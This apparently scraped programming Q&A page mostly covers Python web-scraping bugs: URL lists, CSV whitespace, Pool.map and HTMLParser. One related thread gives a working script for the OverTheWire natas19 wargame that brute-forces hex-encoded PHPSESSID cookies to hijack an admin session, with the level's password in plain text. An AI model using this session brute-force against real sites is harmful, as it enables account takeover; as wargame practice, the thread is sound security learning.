How to scrape many dynamic urls in Python

How to scrape many dynamic urls in Python - python

I want to scrape one dynamic url at a time.
What I did is that I scrape the URL from that I get from all the hrefs and then I want to scrape that URL.
What I am trying:
from bs4 import BeautifulSoup
import urllib.request
import re
r = urllib.request.urlopen('http://i.cantonfair.org.cn/en/ExpExhibitorList.aspx?k=glassware')
soup = BeautifulSoup(r, "html.parser")
links = soup.find_all("a", href=re.compile(r"expexhibitorlist\.aspx\?categoryno=[0-9]+"))
linksfromcategories = ([link["href"] for link in links])
string = "http://i.cantonfair.org.cn/en/"
str1 = [string + x for x in linksfromcategories]
fulllinksfromcategories = '\n'.join(str1)
lfc = urllib.request.urlopen(fulllinksfromcategories).read()
soup2 = BeautifulSoup(lfc,"html.parser")
print(soup2)
But it gives me the following error:
Traceback (most recent call last):
File "D:\python\scarpepython.py", line 50, in <module>
lfc = urllib.request.urlopen(fulllinksfromcategories).read()
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 162, in urlopen
return opener.open(url, data, timeout)
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 465, in open
response = self._open(req, data)
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 483, in _open
'_open', req)
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 443, in _call_chain
result = func(*args)
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 1268, in http_open
return self.do_open(http.client.HTTPConnection, req)
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\urllib\request.py", line 1243, in do_open
r = h.getresponse()
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\http\client.py", line 1174, in getresponse
response.begin()
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\http\client.py", line 282, in begin
version, status, reason = self._read_status()
File "C:\Users\amanp\AppData\Local\Programs\Python\Python35-32\lib\http\client.py", line 264, in _read_status
raise BadStatusLine(line)
http.client.BadStatusLine:

this could be an option using lxml.
from sys import exit
from pprint import pprint
import lxml.html
import requests
import re
url = 'http://i.cantonfair.org.cn/en/ExpExhibitorList.aspx?k=glassware&page=1'
doc = requests.get(url)
root = lxml.html.fromstring(doc.text)
regexp_total_pages = re.compile(ur"Pages\s\d\/(\d+)")
text_total_pages = root.xpath('//*[#id="AspNetPager1"]/div[1]/text()')[0].strip()
total_pages = int(re.match(regexp_total_pages,text_total_pages).group(1))
all_links = list()
for i in range(1,total_pages + 1):
url = "http://i.cantonfair.org.cn/en/ExpExhibitorList.aspx?k=glassware&page={page}".format(page=i)
doc = requests.get(url)
root = lxml.html.fromstring(doc.text)
all_links.append(root.xpath('//*[#id="form1"]/div[*]/div[*]/h3/a/#href'))
pprint(all_links)
Output:
[['expCompany.aspx?corpid=0776011226',
'expCompany.aspx?corpid=0767408756',
'expCompany.aspx?corpid=0768210055',
'expCompany.aspx?corpid=0797720568',
'expCompany.aspx?corpid=0732708199',
'expCompany.aspx?corpid=0793210033',
'expCompany.aspx?corpid=0732106474',
'expCompany.aspx?corpid=0758010034',
'expCompany.aspx?corpid=0971067386',
'expCompany.aspx?corpid=0740321671'],
['expCompany.aspx?corpid=0778019678',
'expCompany.aspx?corpid=0856547211',
'expCompany.aspx?corpid=0786118468',
'expCompany.aspx?corpid=0836547578',
'expCompany.aspx?corpid=0898829143',
'expCompany.aspx?corpid=0785822466',
'expCompany.aspx?corpid=0886647641',
'expCompany.aspx?corpid=0965278225',
'expCompany.aspx?corpid=0889552449',
'expCompany.aspx?corpid=0757118156'],
['expCompany.aspx?corpid=0800629095',
'expCompany.aspx?corpid=0797100877',
'expCompany.aspx?corpid=0791001566',
'expCompany.aspx?corpid=0955274359',
'expCompany.aspx?corpid=0789803409',
'expCompany.aspx?corpid=0769413578',
'expCompany.aspx?corpid=0712314777',
'expCompany.aspx?corpid=0873048367',
'expCompany.aspx?corpid=0716520166',
'expCompany.aspx?corpid=1444012375'],
['expCompany.aspx?corpid=1020485398',
'expCompany.aspx?corpid=1218502245',
'expCompany.aspx?corpid=1197393480',
'expCompany.aspx?corpid=1366309374',
'expCompany.aspx?corpid=1204799012',
'expCompany.aspx?corpid=1078880722',
'expCompany.aspx?corpid=1367905785',
'expCompany.aspx?corpid=1427517382',
'expCompany.aspx?corpid=1377308235',
'expCompany.aspx?corpid=1437717128'],
['expCompany.aspx?corpid=1361609356',
'expCompany.aspx?corpid=1532524260',
'expCompany.aspx?corpid=1512425129',
'expCompany.aspx?corpid=1371110608',
'expCompany.aspx?corpid=1021582521',
'expCompany.aspx?corpid=0829323712',
'expCompany.aspx?corpid=0756508698',
'expCompany.aspx?corpid=0781315922',
'expCompany.aspx?corpid=0850325858',
'expCompany.aspx?corpid=0713405337'],
['expCompany.aspx?corpid=0895550135',
'expCompany.aspx?corpid=0736604457',
'expCompany.aspx?corpid=0761821937',
'expCompany.aspx?corpid=0853755897',
'expCompany.aspx?corpid=0807455302',
'expCompany.aspx?corpid=0763919269',
'expCompany.aspx?corpid=0736104221',
'expCompany.aspx?corpid=0796616555',
'expCompany.aspx?corpid=0804229227',
'expCompany.aspx?corpid=0746304700'],
['expCompany.aspx?corpid=0839047328',
'expCompany.aspx?corpid=0875628420',
'expCompany.aspx?corpid=0869651030',
'expCompany.aspx?corpid=0838653323',
'expCompany.aspx?corpid=0779107569',
'expCompany.aspx?corpid=0748806674',
'expCompany.aspx?corpid=0736602141',
'expCompany.aspx?corpid=0722715458',
'expCompany.aspx?corpid=0782910676',
'expCompany.aspx?corpid=0798114121'],
['expCompany.aspx?corpid=0830450037',
'expCompany.aspx?corpid=0723700490',
'expCompany.aspx?corpid=0889823692',
'expCompany.aspx?corpid=0984073042',
'expCompany.aspx?corpid=0726719753',
'expCompany.aspx?corpid=0742406942',
'expCompany.aspx?corpid=0742119461',
'expCompany.aspx?corpid=0728315987',
'expCompany.aspx?corpid=0818248812',
'expCompany.aspx?corpid=0750419352'],
['expCompany.aspx?corpid=0982275722',
'expCompany.aspx?corpid=0815756641',
'expCompany.aspx?corpid=0712604536',
'expCompany.aspx?corpid=0798617576',
'expCompany.aspx?corpid=0734217566',
'expCompany.aspx?corpid=0878728894',
'expCompany.aspx?corpid=0772422523',
'expCompany.aspx?corpid=0784607985',
'expCompany.aspx?corpid=0786204936',
'expCompany.aspx?corpid=0886423907'],
['expCompany.aspx?corpid=0789300431',
'expCompany.aspx?corpid=0779921604',
'expCompany.aspx?corpid=0794403082',
'expCompany.aspx?corpid=0769111680',
'expCompany.aspx?corpid=0746606839',
'expCompany.aspx?corpid=0896726003',
'expCompany.aspx?corpid=0886728390',
'expCompany.aspx?corpid=0841756743',
'expCompany.aspx?corpid=1010680461',
'expCompany.aspx?corpid=0837456503'],
['expCompany.aspx?corpid=0735317945',
'expCompany.aspx?corpid=0858556012',
'expCompany.aspx?corpid=0883227862',
'expCompany.aspx?corpid=0802151577',
'expCompany.aspx?corpid=0725403915',
'expCompany.aspx?corpid=0773118307',
'expCompany.aspx?corpid=0977967839',
'expCompany.aspx?corpid=0889257398',
'expCompany.aspx?corpid=0773003774',
'expCompany.aspx?corpid=0741211862'],
['expCompany.aspx?corpid=0944767300',
'expCompany.aspx?corpid=0766703225',
'expCompany.aspx?corpid=0807623222',
'expCompany.aspx?corpid=0754416485',
'expCompany.aspx?corpid=0716414765',
'expCompany.aspx?corpid=0764603066',
'expCompany.aspx?corpid=0757110589',
'expCompany.aspx?corpid=0800248632',
'expCompany.aspx?corpid=0747902779',
'expCompany.aspx?corpid=0738619647'],
['expCompany.aspx?corpid=1098582416',
'expCompany.aspx?corpid=0909669961',
'expCompany.aspx?corpid=0862829627',
'expCompany.aspx?corpid=0892328884',
'expCompany.aspx?corpid=0886729635',
'expCompany.aspx?corpid=0724805261',
'expCompany.aspx?corpid=0877655294',
'expCompany.aspx?corpid=0835853958',
'expCompany.aspx?corpid=0737821957',
'expCompany.aspx?corpid=0785019255'],
['expCompany.aspx?corpid=0873828585',
'expCompany.aspx?corpid=0735401884',
'expCompany.aspx?corpid=0927058069',
'expCompany.aspx?corpid=0794816876',
'expCompany.aspx?corpid=0721211392',
'expCompany.aspx?corpid=0741602341',
'expCompany.aspx?corpid=0760906105',
'expCompany.aspx?corpid=0904473659',
'expCompany.aspx?corpid=0711614568',
'expCompany.aspx?corpid=0753503530'],
['expCompany.aspx?corpid=0774108002',
'expCompany.aspx?corpid=0845328722',
'expCompany.aspx?corpid=0823848403',
'expCompany.aspx?corpid=0876029511',
'expCompany.aspx?corpid=0886827914',
'expCompany.aspx?corpid=0712712280',
'expCompany.aspx?corpid=0833854881',
'expCompany.aspx?corpid=0746216867',
'expCompany.aspx?corpid=0774704214',
'expCompany.aspx?corpid=0730516488'],
['expCompany.aspx?corpid=0716607064',
'expCompany.aspx?corpid=0758917403',
'expCompany.aspx?corpid=0763702256',
'expCompany.aspx?corpid=0721303394',
'expCompany.aspx?corpid=0828647452',
'expCompany.aspx?corpid=0771805641',
'expCompany.aspx?corpid=0741722489',
'expCompany.aspx?corpid=0980867582',
'expCompany.aspx?corpid=0790809611',
'expCompany.aspx?corpid=0714917484'],
['expCompany.aspx?corpid=0790402155',
'expCompany.aspx?corpid=0710118558',
'expCompany.aspx?corpid=0864455955',
'expCompany.aspx?corpid=0784706276',
'expCompany.aspx?corpid=0897623416',
'expCompany.aspx?corpid=0821453137',
'expCompany.aspx?corpid=0754917280',
'expCompany.aspx?corpid=0724600646',
'expCompany.aspx?corpid=0764211415',
'expCompany.aspx?corpid=0735008307'],
['expCompany.aspx?corpid=0795909343',
'expCompany.aspx?corpid=0850830043',
'expCompany.aspx?corpid=0970778277',
'expCompany.aspx?corpid=1075781404',
'expCompany.aspx?corpid=1252802513',
'expCompany.aspx?corpid=1236901616',
'expCompany.aspx?corpid=1435215908',
'expCompany.aspx?corpid=1469712283',
'expCompany.aspx?corpid=1439615100',
'expCompany.aspx?corpid=1245501009'],
['expCompany.aspx?corpid=0901974362',
'expCompany.aspx?corpid=1487117816',
'expCompany.aspx?corpid=1058881186',
'expCompany.aspx?corpid=0809557305',
'expCompany.aspx?corpid=1265998039',
'expCompany.aspx?corpid=1188093431',
'expCompany.aspx?corpid=0995572026',
'expCompany.aspx?corpid=1036184837',
'expCompany.aspx?corpid=0990573086',
'expCompany.aspx?corpid=1464212531'],
['expCompany.aspx?corpid=0858351382',
'expCompany.aspx?corpid=1348806571',
'expCompany.aspx?corpid=0822452086',
'expCompany.aspx?corpid=1428413902',
'expCompany.aspx?corpid=0879752062',
'expCompany.aspx?corpid=1369405760',
'expCompany.aspx?corpid=1256000612',
'expCompany.aspx?corpid=1037680042',
'expCompany.aspx?corpid=1062381570',
'expCompany.aspx?corpid=1461915811'],
['expCompany.aspx?corpid=1373808159',
'expCompany.aspx?corpid=1027382040',
'expCompany.aspx?corpid=1191393458',
'expCompany.aspx?corpid=1133389590',
'expCompany.aspx?corpid=0762910036',
'expCompany.aspx?corpid=1399206654',
'expCompany.aspx?corpid=1253598637',
'expCompany.aspx?corpid=1128889405',
'expCompany.aspx?corpid=1082384190',
'expCompany.aspx?corpid=1077881359'],
['expCompany.aspx?corpid=1584325065',
'expCompany.aspx?corpid=1131692156',
'expCompany.aspx?corpid=1587322969',
'expCompany.aspx?corpid=1251100353',
'expCompany.aspx?corpid=1115590386',
'expCompany.aspx?corpid=1541424572',
'expCompany.aspx?corpid=1137393378',
'expCompany.aspx?corpid=1069988131',
'expCompany.aspx?corpid=1392806069',
'expCompany.aspx?corpid=0766210029'],
['expCompany.aspx?corpid=1143394259',
'expCompany.aspx?corpid=1561819111',
'expCompany.aspx?corpid=1349307520']]

str1 in your case contains a list of URLs. You are joining this list of URLs into a single string separated by newlines and then try to navigate to that mix which of course would not work.
Instead, you meant to loop over the extracted URLs one by one and navigate:
linksfromcategories = [string + x for x in linksfromcategories]
for link in linksfromcategories:
print(link)
lfc = urllib.request.urlopen(link).read()
soup2 = BeautifulSoup(lfc,"html.parser")
print(soup2)

Related

Can't put result of hexlify as cookie in requests.post

So the issue is with this code.
import requests
import string
import binascii
import codecs
url="http://natas19.natas.labs.overthewire.org/"
user="natas19"
passwd="8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s"
cookie=dict(PHPSESSID="0")
test="{}-admin"
for i in range(0,641):
with requests.Session() as sesh:
encoded=binascii.hexlify(bytes(test.format(i),"utf-8"))
print("Trying: " + str(i) + "-admin")
print(encoded)
cookie=dict(PHPSESSID=encoded)
sesh.post(url,auth=(user,passwd),cookies=cookie)
r=sesh.get(url,auth=(user,passwd)).content
print(r)
print(sesh.cookies.get_dict())
if "You are an admin." in str(r):
print("Success! Admin website:\n" + str(sesh.get(url,auth=(user,passwd)).content))
break;
else:
print("Failed.")
The hexlify returns a value like b'302d61646d696e', but the post later on considers it a string for some reason:
Trying: 0-admin
b'302d61646d696e'
Traceback (most recent call last):
File "C:/Users/jakub/Desktop/natas19.py", line 17, in <module>
sesh.post(url,auth=(user,passwd),cookies=cookie)
File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 635, in post
return self.request("POST", url, data=data, json=json, **kwargs)
File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 573, in request
prep = self.prepare_request(req)
File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 471, in prepare_request
cookies = cookiejar_from_dict(cookies)
File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\cookies.py", line 537, in cookiejar_from_dict
cookiejar.set_cookie(create_cookie(name, cookie_dict[name]))
File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\cookies.py", line 352, in set_cookie
and cookie.value.startswith('"')
TypeError: startswith first arg must be bytes or a tuple of bytes, not str
If I decode the hexlify result instead then the code runs, but without sending the cookie. Please help and thank you in advance!

Try to put .decode('utf-8') at the end of encoded=:
import requests
url = "http://natas19.natas.labs.overthewire.org/"
user = "natas19"
passwd = "8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s"
cookie = dict(PHPSESSID="0")
test = "{}-admin"
for i in range(0, 641):
with requests.Session() as sesh:
encoded = binascii.hexlify(bytes(test.format(i), "utf-8")).decode('utf-8') # <-- put decode() here!
print("Trying: " + str(i) + "-admin")
print(encoded)
cookie = dict(PHPSESSID=encoded)
sesh.post(url, auth=(user, passwd), cookies=cookie)
r = sesh.get(url, auth=(user, passwd)).content
print(r)
print(sesh.cookies.get_dict())
if "You are an admin." in str(r):
print(
"Success! Admin website:\n"
+ str(sesh.get(url, auth=(user, passwd)).content)
)
break
else:
print("Failed.")

Unexpected space (not sure what the type of character this space is) while parsing csv file in python

I am iterating through a list of urls from a csv file trying to locate their sitemaps, however, I am getting a weird leading space issue that's causing an error to occur when requests processes each url. I'm trying to figure out what's causing this space to be generated and what type of space it is. I believe something funky is happening with strip() because I can get this to run fine when copying and pasting a url into requests. I am just not sure what type of space this is and what's causing it to occur.
Wondering if anyone else is having or had this issue?
So far I have tried to solve using the following methods:
replace()
"".join(split())
regex
Here is my code:
with open('links.csv') as f:
for line in f:
strdomain = line.strip()
if strdomain:
domain = strdomain
fix_domain = domain.replace('https://', '').replace('www', '').replace('/', '').replace('.', '').replace(' ', '')
ofile = fix_domain + '.txt' # args.ofile
domain_rem = domain
map = find_sitemap.get_sitemap(domain_rem+"sitemap.xml")
url_info = find_sitemap.parse_sitemap(map)
print("Found {0} urls".format(len(url_info)))
new_urls = []
for u in url_info:
new_urls.append(u)
print(u)
links.csv look like the following with just one column:
https://site1.com/
https://site2.com/
https://site3.com/
I printed domain and strdomain and even added the word "this" next to the variable domain so you can see the space being produced clearly:
Here is the error I receive in full when running (you will notice there is no leading space within the url after I've copied and pasted from the terminal into here however I provide an image of my terminal below so you can see it):
Traceback (most recent call last):
File "/Users/natehurwitz/PROJECTS/axis/axis/apps/axisDataFinder/map_website.py", line 358, in <module>
main()
File "/Users/natehurwitz/PROJECTS/axis/axis/apps/axisDataFinder/map_website.py", line 318, in main
map = find_sitemap.get_sitemap(domain_rem+"sitemap.xml")
File "/Users/natehurwitz/PROJECTS/axis/axis/apps/axisDataFinder/find_sitemap.py", line 5, in get_sitemap
get_url = requests.get(url)
File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/api.py", line 72, in get
return request('get', url, params=params, **kwargs)
File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/api.py", line 58, in request
return session.request(method=method, url=url, **kwargs)
File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/sessions.py", line 522, in request
resp = self.send(prep, **send_kwargs)
File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/sessions.py", line 636, in send
adapter = self.get_adapter(url=request.url)
File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/sessions.py", line 727, in get_adapter
raise InvalidSchema("No connection adapters were found for '%s'" % url)
requests.exceptions.InvalidSchema: No connection adapters were found for 'https://blkgrn.com/sitemap.xml'
Here is where you can see the leading space that occurs
Here is the code for "find_sitemap.py":
from bs4 import BeautifulSoup
import requests
def get_sitemap(url):
get_url = requests.get(url)
if get_url.status_code == 200:
return get_url.text
else:
print ('Unable to fetch sitemap: %s.' % url)
def process_sitemap(s):
soup = BeautifulSoup(s, "lxml")
result = []
for loc in soup.findAll('loc'):
item = {}
item['loc'] = loc.text
item['tag'] = loc.parent.name
if loc.parent.lastmod is not None:
item['lastmod'] = loc.parent.lastmod.text
if loc.parent.changeFreq is not None:
item['changeFreq'] = loc.parent.changeFreq.text
if loc.parent.priority is not None:
item['priority'] = loc.parent.priority.text
result.append(item)
return result
def is_sub_sitemap(s):
if s['loc'].endswith('.xml') and s['tag'] == 'sitemap':
return True
else:
return False
def parse_sitemap(s):
sitemap = process_sitemap(s)
result = []
while sitemap:
candidate = sitemap.pop()
if is_sub_sitemap(candidate):
sub_sitemap = get_sitemap(candidate['loc'])
for i in process_sitemap(sub_sitemap):
sitemap.append(i)
else:
result.append(candidate)
return result

Weird error with pool module and beautiful soup: Invalid URL 'h'

I am scraping a very large website with Beautiful Soup for a project and want to use the Pool module to speed it up. I am getting a weird error where it is not correctly reading the list of URL's, as far as I can tell it is just grabbing the first 'h'.
The entire code works perfectly if I do not use pool. The list of URL's is read properly. I am not sure if there is something weird about how you have to prepare the URL's when calling p.map(scrapeClauses, links) because if I simply call scrapeClauses(links) everything works.
Here is my main function:
if __name__ == '__main__':
links = list()
og = 'https://www.lawinsider.com'
halflink = '/clause/limitation-of-liability'
link = og + halflink
links.append(link)
i = 0
while i < 50:
try:
nextLink = generateNextLink(link)
links.append(nextLink)
link = nextLink
i += 1
except:
print('Only ', i, 'links found')
i = 50
start_time = time.time()
print(links[0])
p = Pool(5)
p.map(scrapeClauses, links)
p.terminate()
p.join()
#scrapeClauses(links)
and here is scrapeClauses():
def scrapeClauses(links):
#header to avoid site detecting scraper
headers = requests.utils.default_headers()
headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
})
#list of clauses
allText = []
number = 0
for line in links:
page_link = line
print(page_link)
page_response = requests.get(page_link, headers=headers)
html_soup = BeautifulSoup(page_response.content, "html.parser")
assignments = html_soup.find_all('div', class_ ='snippet-content')
for i in range(len(assignments)):
assignments[i] = assignments[i].get_text()
#option to remove te assignment that precedes each clause
#assignments[i] = assignments[i].replace('Assignment.','',1)
allText.append(assignments[i])
#change the index of the name of the word doc
name = 'limitationOfLiability' + str(number) + '.docx'
#some clauses have special characters tat produce an error
try:
document = Document()
stuff = assignments[i]
document.add_paragraph(stuff)
document.save(name)
number += 1
except:
continue
I did not include generateNextLink() to save space and because I am pretty sure the error is not in there but if someone thinks it is I will provide it.
As you can see I 'print(page_link) in scrapeClauses. If I am not using pool, it will print all the normal links. But if I use pool, a bunch of h's print out line after line. I then get and error that h is not a valid URL. I will show the error code below.
https://www.lawinsider.com/clause/limitation-of-liability
h
h
h
h
h
h
h
h
h
h
h
h
h
h
h
h
h
multiprocessing.pool.RemoteTraceback:
"""
Traceback (most recent call last):
File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\multiproce
ssing\pool.py", line 121, in worker
result = (True, func(*args, **kwds))
File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\multiproce
ssing\pool.py", line 44, in mapstar
return list(map(*args))
File "C:\Users\wquinn\Web Scraping\assignmentBSScraper.py", line 20, in scrape
Clauses
page_response = requests.get(page_link, headers=headers)
File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packa
ges\requests\api.py", line 75, in get
return request('get', url, params=params, **kwargs)
File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packa
ges\requests\api.py", line 60, in request
return session.request(method=method, url=url, **kwargs)
File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packa
ges\requests\sessions.py", line 519, in request
prep = self.prepare_request(req)
File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packa
ges\requests\sessions.py", line 462, in prepare_request
hooks=merge_hooks(request.hooks, self.hooks),
File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packa
ges\requests\models.py", line 313, in prepare
self.prepare_url(url, params)
File "C:\Users\wquinn\AppData\Local\Programs\Python\Python37-32\lib\site-packa
ges\requests\models.py", line 387, in prepare_url
raise MissingSchema(error)
requests.exceptions.MissingSchema: Invalid URL 'h': No schema supplied. Perhaps
you meant http://h?

The second argument of p.map get an list. Each such element will be sent to a function. So you function got a string and not a list of string as you expect.
The minimal example is:
from multiprocessing import Pool
def f(str_list):
for x in str_list:
print ('hello {}'.format(x))
if __name__ == '__main__':
str_list = ['111', '2', '33']
p = Pool(5)
p.map(f, str_list)
p.terminate()
p.join()
Output is:
hello 1
hello 1
hello 1
hello 2
hello 3
hello 3

Feedly API & JSON

I'm trying to access the Feedly API to collect and share articles automatically to a Facebook group. So far, I haven't even able to figure out how to use the Feedly API wrapper located here: https://github.com/zgw21cn/FeedlyClient
from feedlyclient import FeedlyClient
# Feedly
feedaccess = "removed"
myfeedId = "removed"
con = FeedlyClient()
con.get_feed_content(feedaccess,myfeedId,False,10000)
parsed = json.loads(con)
print json.dumps(parsed)
Terminal
PS D:\Python Projects\Python 2\fbauto> & python "d:/Python Projects/Python 2/fbauto/feedlytest.py"
Traceback (most recent call last):
File "d:/Python Projects/Python 2/fbauto/feedlytest.py", line 8, in <module>
con = FeedlyClient.get_feed_content(feedaccess,myfeedId,False,10000)
TypeError: unbound method get_feed_content() must be called with FeedlyClient instance as first argument (got str instance instead)
PS D:\Python Projects\Python 2\fbauto> & python "d:/Python Projects/Python 2/fbauto/feedlytest.py"
Traceback (most recent call last):
File "d:/Python Projects/Python 2/fbauto/feedlytest.py", line 9, in <module>
con.get_feed_content(feedaccess,myfeedId,False,10000)
File "d:\Python Projects\Python 2\fbauto\feedlyclient.py", line 75, in get_feed_content
return res.json()
File "C:\Python27\lib\site-packages\requests\models.py", line 892, in json
return complexjson.loads(self.text, **kwargs)
File "C:\Python27\lib\json\__init__.py", line 339, in loads
return _default_decoder.decode(s)
File "C:\Python27\lib\json\decoder.py", line 364, in decode
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
File "C:\Python27\lib\json\decoder.py", line 382, in raw_decode
raise ValueError("No JSON object could be decoded")
ValueError: No JSON object could be decoded
Please help.
SECOND ATTEMPT
import json
import requests
# Feedly
feedaccess = "REMOVED"
myfeedid = "user/REMOVED/category/tutorial"
def get_feed_content(unreadOnly=None, newerThan=None, count="10",
continuation=None,
ranked=None):
"""
return contents of a feed
:param access_token:
:param streamId:
:param unreadOnly:
:param newerThan:
:param count:
:param continuation:
:param ranked:
:return:
"""
headers = {'Authorization': 'OAuth ' + feedaccess}
quest_url = ('http://cloud.feedly.com/v3/streams/contents')
params = dict(streamId=myfeedid)
# Optional parameters
if unreadOnly is not None:
params['unreadOnly'] = unreadOnly
if newerThan is not None:
params['newerThan'] = newerThan
if count is not None:
params['count'] = count
if continuation is not None:
params['continuation'] = continuation
if ranked is not None:
params['ranked'] = ranked
res = requests.get(url=quest_url, params=params, headers=headers)
return res.json()
con = get_feed_content()
print json.dumps(con , indent=4)
TERMINAL
{
"items": [],
"id": "user/REMOVED/category/tutorial"
}
Just returns my user credentials. Feedly documentation says I can use category as stream ID. https://developer.feedly.com/v3/streams/
THIRD ATTEMPT
import json
import requests
from client import FeedlyClient
# Feedly
feedaccess = "REMOVED"
myfeedid = "user/REMOVED/category/tutorial"
feedcount = "20"
myurl = "http://cloud.feedly.com/v3/streams/contents?streamId=" + myfeedid + "&count=" + feedcount
headers = {'Authorization': 'OAuth ' + feedaccess}
res = requests.get(url=myurl, headers=headers)
con = res.json()
print json.dumps(con , indent=4)
SAME TERMINAL RESPONSE

The third attempt worked. There was a capitalization in my category name. It should be Tutorial not tutorial. Please see original post for code.

Why does HTMLParser miss some tags?

I used HTMLParser to count how many h2 tag in http://www.worldgolf.com/courses/usa/massachusetts/
here is the code:
class City2Parser(HTMLParser):
def handle_starttag(self,tag,attrs):
if tag == 'h2':
print 'h2'
req = urllib2.Request('http://www.worldgolf.com/courses/usa/massachusetts/')
html = urllib2.urlopen(req)
parser = City2Parser()
parser.feed(html.read())
it only prints once, why? obviously the page has three h2 tag

You'd have to implement a bunch of handlers in your City2Parser to handle the mess of tags and javascript that HTMLParser doesn't seem to take care of out of the box. Why don't you instead use something like BeautiflSoup:
from BeautifulSoup import BeautifulSoup
import urllib2
page = urllib2.urlopen('http://www.worldgolf.com/courses/usa/massachusetts/')
soup = BeautifulSoup(page)
s = soup.findAll('h2')
print len(s)
for t in s:
print t.text
gives:
3
Featured Massachusetts Golf Course
Golf Locations
Latest user ratings for Massachusetts golf courses
Unless the point is to use HTMLParser.

Look at what happens.
>>> from HTMLParser import HTMLParser
>>> import urllib2
>>> class City2Parser(HTMLParser):
... def handle_starttag(self,tag,attrs):
... if tag == 'h2':
... print 'h2'
...
>>> req = urllib2.Request('http://www.worldgolf.com/courses/usa/massachusetts/')
>>> html = urllib2.urlopen(req)
>>> parser = City2Parser()
>>> parser.feed(html.read())
h2
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/usr/lib/python2.7/HTMLParser.py", line 109, in feed
self.goahead(0)
File "/usr/lib/python2.7/HTMLParser.py", line 151, in goahead
k = self.parse_starttag(i)
File "/usr/lib/python2.7/HTMLParser.py", line 232, in parse_starttag
endpos = self.check_for_whole_start_tag(i)
File "/usr/lib/python2.7/HTMLParser.py", line 307, in check_for_whole_start_tag
self.error("malformed start tag")
File "/usr/lib/python2.7/HTMLParser.py", line 116, in error
raise HTMLParseError(message, self.getpos())
HTMLParser.HTMLParseError: malformed start tag, at line 249, column 30
It's complaining about the invalid HTML <br style="clear:left;". HTMLParser cares about getting valid HTML.

Develop Reference

Python is a programming language that lets you work quickly and integrate systems more effectively.

How to scrape many dynamic urls in Python - python

Related

Can't put result of hexlify as cookie in requests.post

Unexpected space (not sure what the type of character this space is) while parsing csv file in python

Weird error with pool module and beautiful soup: Invalid URL 'h'

Feedly API & JSON

Why does HTMLParser miss some tags?

Categories

Resources